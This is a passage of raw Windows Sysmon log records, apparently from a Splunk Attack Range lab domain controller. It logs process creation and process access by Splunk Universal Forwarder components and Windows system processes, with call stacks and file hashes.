4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.068{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-95BA-6005-6705-00000000A301}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.068{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95BA-6005-6705-00000000A301}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.068{59A5CD1D-95BA-6005-6705-00000000A301}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.998{59A5CD1D-95BA-6005-6805-00000000A301}61044472C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.911{59A5CD1D-95BC-6005-6A05-00000000A301}43006988C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.755{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95BC-6005-6A05-00000000A301}4300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.755{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.755{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.755{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.755{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.755{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-95BC-6005-6A05-00000000A301}4300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.755{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95BC-6005-6A05-00000000A301}4300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.755{59A5CD1D-95BC-6005-6A05-00000000A301}4300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.239{59A5CD1D-95BC-6005-6905-00000000A301}6036824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.087{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95BC-6005-6905-00000000A301}6036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.085{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.085{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.084{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.084{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.084{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-95BC-6005-6905-00000000A301}6036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.084{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95BC-6005-6905-00000000A301}6036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.084{59A5CD1D-95BC-6005-6905-00000000A301}6036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:49.494{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95BD-6005-6B05-00000000A301}6268C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:49.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:49.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:49.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:49.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:49.492{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-95BD-6005-6B05-00000000A301}6268C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:49.491{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95BD-6005-6B05-00000000A301}6268C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program 